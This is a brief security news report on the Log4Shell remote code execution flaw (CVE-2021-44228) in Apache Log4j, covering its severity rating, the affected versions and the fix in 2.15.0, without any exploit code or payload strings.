The Apache Software Foundation has released an emergency security update to patch a remote code execution vulnerability (CVE-2021-44228) in the Java Log4j library – apache.org.

The vulnerability, now dubbed Log4Shell, can be exploited by forcing Java-based applications and servers, where the Log4j library was used, to log a specially crafted string into their internal systems. When the app or server processes the logs, this string can force the vulnerable system to download and run a malicious script from an attacker-controlled domain. Thus, hackers can take control of the application or server.

The Log4Shell vulnerability rated with a score of 10/10 on the CVSSv3 severity scale. CVE-2021-44228 affects log4j versions between 2.0-beta-9 and 2.14.1. The issue doesn’t exist in log4j 1 and has been fixed in 2.15.0.

Source: securitylab.ru